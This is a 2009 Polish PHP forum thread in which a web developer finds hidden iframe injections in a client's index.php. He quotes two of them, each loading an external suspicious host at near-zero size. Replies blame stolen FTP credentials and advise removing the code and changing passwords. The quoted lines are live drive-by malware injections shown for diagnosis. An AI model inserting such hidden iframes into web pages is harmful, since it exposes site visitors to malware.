Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> Exploit czy co?
axwell
post
Post #1





Grupa: Zarejestrowani
Postów: 143
Pomógł: 1
Dołączył: 14.11.2007

Ostrzeżenie: (10%)
X----

Znajomy poprosił mnie o pewne przeróbki na stronie jego firmy. Zrobiłem wszystko jak należy, a następnie zakutalizowałem pliki. Oczywiście sprawdzałem czy wszytsko chodzi tak jak powinno. Nie było żadnego problemu. Dziś dzwoni do mnie i mówi że strona nie działa - wywala błąd php w składni w "index.php". Najdziwniejsze jest to, że pliku index.php w ogóle nigdy nie modyfikowałem. Zaglądam do kodu patrze a tu na końcu linijka:

[HTML] pobierz, plaintext 
  1. <iframe src="http://nonfatcarbest.cn/ts/in.cgi?mozila16" width=2 height=4 style="visibility: hidden"></iframe>
[HTML] pobierz, plaintext


i jescze w innym miejscu coś takiego:
[PHP] pobierz, plaintext 
  1. <?php
  2. echo "<iframe src=\"http://nakulpi.net/?click=C42244\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
  3. ?>
[PHP] pobierz, plaintext


Skąd to mogło się wziąć? I jak zapobiec żeby znowu nie "wlazło" ?
Go to the top of the page
+Quote Post
 
 Start new topic
Odpowiedzi
Poker
post
Post #2





Grupa: Zarejestrowani
Postów: 205
Pomógł: 3
Dołączył: 20.04.2009
Skąd: Jaworzno

Ostrzeżenie: (0%)
-----

Pewnie używasz Total Commandera do połączeń z ftp (IMG:http://forum.php.pl/style_emoticons/default/smile.gif)

W dodatku po wejściu na taką stronę AVAST ostrzega o tym że znajduję na niej ROBAK.


Miałem identyczny problem usunąłem ze wszystkich plików index.php / .html te IFRAME'y zmieniłem hasło na FTP i teraz działa bez problemu. Oczywiście nie używam juz Total'a
Go to the top of the page
+Quote Post

Posty w temacie
- axwell   Exploit czy co?   7.05.2009, 17:45:32
- - Spawnm   było o tym kilka razy , wywal to i zmień hasło do ...   7.05.2009, 17:49:17
- - axwell   Przeszukałem forum i nie mogę znaleźć. Może jednak...   7.05.2009, 17:53:38
- - Spawnm   przecież powiedziałem , wywalasz frame z indexów i...   7.05.2009, 17:55:04
- - axwell   To zrobiłem w pierwszej kolejnosći. Ale proszę o o...   7.05.2009, 17:59:29
- - kwiateusz   z komputera tego osobnika co mial haslo do ftp zwy...   7.05.2009, 18:18:28
- - Shadowsword   W niedziele miałem takiego exploita u siebie. Firm...   7.05.2009, 19:26:32
- - Kocurro   Jak masz gównianie skonfigurowany serwer to nawet ...   8.05.2009, 10:20:12
- - Poker   Pewnie używasz Total Commandera do połączeń z ftp ...   8.05.2009, 10:55:37
- - ExPlOiT   Pisałem już co i jak: http://forum.php.p...   8.05.2009, 12:54:55
- - zwierzołak   CytatW niedziele miałem takiego exploita u siebie....   8.05.2009, 15:44:46
- - Shadowsword   Też nie sądze, że to był brute force, ale tak mi n...   8.05.2009, 16:44:15

« Następny starszy · Hydepark · Następny nowszy »
 

Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 

Tryb wyświetlania: Przełącz na: Standardowy · Przełącz na: Linearny+ · Drzewo

Śledź ten temat · Wyślij temat na e-mail · Wydrukuj ten temat · Subskrybuj to forum

RSS Aktualny czas: 13.10.2025 - 18:57
Powered By IP.Board © 2025  IPS, Inc.
All changes by PHP.pl Administrators
Hosting zapewnia NQ.pl hosting, trac, svn